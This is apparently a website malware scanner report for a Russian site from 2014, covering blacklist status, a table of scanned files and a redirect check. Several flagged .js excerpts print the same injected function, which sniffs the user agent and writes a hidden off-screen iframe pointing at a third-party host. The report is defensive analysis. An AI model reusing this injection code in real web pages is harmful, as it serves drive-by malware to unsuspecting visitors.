Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brateckrolik.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brateckrolik.ru/
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://brateckrolik.ru/ | 200 OK Content-Length: 34763 Content-Type: text/html | clean |
http://brateckrolik.ru/includes/jquery/jquery.js | 200 OK Content-Length: 597 Content-Type: application/javascript | clean |
http://brateckrolik.ru/core/js/common.js | 200 OK Content-Length: 894 Content-Type: application/javascript | malicious |
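Malicious code - confirmed by antiviruses (see below). The injected function shown below reads navigator.userAgent and calls document.write only when the string contains "Windows" at an index above 0 and contains neither "Chrome" nor "IEMobile". What it writes is a 138x138 iframe positioned off-screen at -849px that loads a page from a third-party host; the style attribute and the closing tag are split into concatenated string fragments. The same function appears at the start of every excerpt marked malicious in this table, so its name and the iframe host are usable search strings when checking the site's remaining .js files.
function Argisuliterkas() {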
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas(); function reloadCaptcha(img_id){ $("img#"+img_id).attr("src", "/includes/codegen/cms_codegen.php?"+Math.random()); } function centerLink(href){ $.post(href, {'of_ajax': 1}, function(data){ $('div.component').html(data); }); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://brateckrolik.ru/modules/mod_latest/js/latest.js | 200 OK Content-Length: 852 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas(); function conPage(page, module_id){ $.post('/modules/mod_latest/ajax/latest.php', {'module_id': module_id, 'page':page}, function(data){ $('div#module_ajax_'+module_id).html(data); }); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://brateckrolik.ru/registration | 200 OK Content-Length: 19686 Content-Type: text/html | clean |
http://brateckrolik.ru/components/registration/js/check.js | 200 OK Content-Length: 1638 Content-Type: application/javascript | malicious |
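Malicious code - confirmed by antiviruses (see below). The excerpt is cut between the call to Argisuliterkas( and the tail of the file, so the code shown is not syntactically complete. The garbled text inside checkPasswords is Russian in windows-1251 decoded with the wrong charset; it reads "Пароли совпадают" and "Пароли не совпадают!".
function Argisuliterkas() {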
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas( } } } } function checkPasswords(){ var pass1 = $("#pass1input").attr('value'); var pass2 = $("#pass2input").attr('value'); if (pass1 == pass2) { $('#passcheck').html('<span style="color:green">Ïàðîëè ñîâïàäàþò</span>'); } else { $('#passcheck').html('<span style="color:red">Ïàðîëè íå ñîâïàäàþò!</span>'); } };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://brateckrolik.ru/login | 200 OK Content-Length: 12424 Content-Type: text/html | clean |
http://brateckrolik.ru/photos | 200 OK Content-Length: 12995 Content-Type: text/html | clean |
http://brateckrolik.ru/photos/latest.html | 200 OK Content-Length: 32638 Content-Type: text/html | clean |
http://brateckrolik.ru/photos/top.html | 200 OK Content-Length: 32959 Content-Type: text/html | clean |
http://brateckrolik.ru/blogs | 200 OK Content-Length: 60978 Content-Type: text/html | clean |
http://brateckrolik.ru/includes/jquery/jquery.jcorners.js | 200 OK Content-Length: 2872 Content-Type: application/javascript | malicious |
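Malicious code - confirmed by antiviruses (see below). The excerpt is cut between the call to Argisuliterkas( and the tail of the file, so the code shown is not syntactically complete.
function Argisuliterkas() {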
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas( intval: function(v) { v = parseInt(v); return isNaN(v) ? 0 : v; }, guid: function(){ var result, i, j; result = ''; for(j=0; j<32; j++) { if( j == 8 || j == 12|| j == 16|| j == 20) result = result + '-'; i = Math.floor(Math.random()*16).toString(16).toUpperCase(); result = result + i; } return result } }); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://brateckrolik.ru/includes/jquery/syntax/src/shCore.js | 200 OK Content-Length: 597 Content-Type: application/javascript | clean |
http://brateckrolik.ru/includes/jquery/syntax/scripts/shBrushPhp.js | 200 OK Content-Length: 6383 Content-Type: application/javascript | malicious |
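Malicious code - confirmed by antiviruses (see below). The excerpt is cut between the call to Argisuliterkas( and the tail of the file, so the code shown is not syntactically complete.
function Argisuliterkas() {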
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas( this.forHtmlScript(SyntaxHighlighter.regexLib.phpScriptTags); }; SyntaxHighlighter.brushes.Php.prototype = new SyntaxHighlighter.Highlighter(); SyntaxHighlighter.brushes.Php.aliases = ['php']; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://brateckrolik.ru/clubs | 200 OK Content-Length: 16435 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: brateckrolik.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 15 Aug 2014 02:26:19 GMT
Pragma: no-cache
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 34763
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=70dafe197f71ab98d5377e91eb6f8131; path=/
X-Powered-By: PHP/5.2.17
...34763 bytes of data.
GET / HTTP/1.1
Host: brateckrolik.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 15 Aug 2014 02:26:19 GMT
Pragma: no-cache
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 34763
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=70dafe197f71ab98d5377e91eb6f8131; path=/
X-Powered-By: PHP/5.2.17
...34763 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: brateckrolik.ru
Referer: http://www.google.com/search?q=brateckrolik.ru
Result:
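The result is similar to the first query. No suspicious redirects were found. Note that this check only compares the HTTP responses for the home page; the iframe injection reported under "Scanned pages/files" is written client-side by the infected .js files and depends on the visitor's user agent, so it does not show up as a redirect here.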
GET / HTTP/1.1
Host: brateckrolik.ru
Referer: http://www.google.com/search?q=brateckrolik.ru
Result:
The result is similar to the first query. No suspicious redirects were found.